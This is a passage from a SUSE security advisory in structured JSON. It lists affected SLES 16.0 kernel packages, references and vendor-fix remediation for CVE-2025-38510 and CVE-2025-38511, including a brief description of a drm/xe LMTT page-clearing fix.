"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38510"
},
{
"cve": "CVE-2025-38511",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38511"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/pf: Clear all LMTT pages on alloc\n\nOur LMEM buffer objects are not cleared by default on alloc\nand during VF provisioning we only setup LMTT PTEs for the\nactually provisioned LMEM range. But beyond that valid range\nwe might leave some stale data that could either point to some\nother VFs allocations or even to the PF pages.\n\nExplicitly clear all new LMTT page to avoid the risk that a\nmalicious VF would try to exploit that gap.\n\nWhile around add asserts to catch any undesired PTE overwrites\nand low-level debug traces to track LMTT PT life-cycle.\n\n(cherry picked from commit 3fae6918a3e27cce20ded2551f863fb05d4bef8d)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38511",
"url": "https://www.suse.com/security/cve/CVE-2025-38511"
},
{
"category": "external",
"summary": "SUSE Bug 1248175 for CVE-2025-38511",
"url": "https://bugzilla.suse.com/1248175"
},
{
"category": "external",
"summary": "SUSE Bug 1248176 for CVE-2025-38511",
"url": "https://bugzilla.suse.com/1248176"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
